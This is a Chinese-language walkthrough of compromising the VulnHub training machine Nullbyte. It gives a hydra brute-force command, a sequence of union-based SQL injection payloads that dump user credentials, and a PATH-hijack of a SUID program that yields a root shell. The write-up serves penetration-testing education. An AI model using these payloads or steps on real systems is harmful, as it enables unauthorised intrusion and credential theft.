文章总结： 本文记录了VulnHub靶场Nullbyte的完整渗透过程，包括信息搜集、端口扫描、通过GIF隐藏注释发现入口、hydra爆破密钥、SQL注入获取凭证、Base64与MD5解密、最终利用SUID程序进行PATH劫持提权至root。文章展示了从信息搜集到权限提升的完整攻击链，命令具体可复现，适合初学者学习渗透测试流程与技巧。 综合评分： 78 文章分类： 渗透测试,实战经验,WEB安全,红队,内网渗透

确实是一个gif

一个专门的查看软件进行查看

comment有隐藏信息

作为路径访问尝试

有一个新的页面 让输入key:

这里就只能爆破了其实。。。

hydra 192.168.137.138 http-form-post "/kzMb5nVYJw/index.php:Key=^PASS^:invalid key" -l week -P /usr/share/wordlists/rockyou.txt

最后爆破出来的是elite

进到里面是一个查询页面

几个sql信息搜集：

database()user()@@version()

usrtosearch=1" order by 3 --+usrtosearch=1" union select 1,2,database()--+usrtosearch=1" union select table_name,2,3 from information_schema.tables where table_schema='seth' ;--+usrtosearch=1" union select column_name,2,3 from information_schema.columns where table_schema='seth' and table_name = 'users'--+usrtosearch=1" union select user,pass,position form users --+

最后拿到一个字符串：

YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

看着像base64:

echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d

这里解密之后返回的是一个md5

解密之后发现是omega

可以直接使用ramses omega登入

不能运行sudo。。。

/etc/passwd

用户home目录没东西

计划任务没东西。。。

然后看一下网站目录：

/var/www有一个backup:

里面是这个东西：

这个程序是以s运行的 那就很好了。

看输出，他这个程序有点像运行了ps

那就创建一个ps命令 让这个ps命令转向/bin/sh

然后把这个ps路径加到系统路径

这样运行这个程序的时候就会调用我们指定路径的ps 进一步调用里面的/bin/sh

因为这个程序是默认root权限运行 所以调用的/bin/sh也会是root

ln -s /bin/sh psexport PATH=.:$PATH

已经root了~~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺 网安热爱者week 网安热爱者week《跟着红队笔记打靶：nullbyte》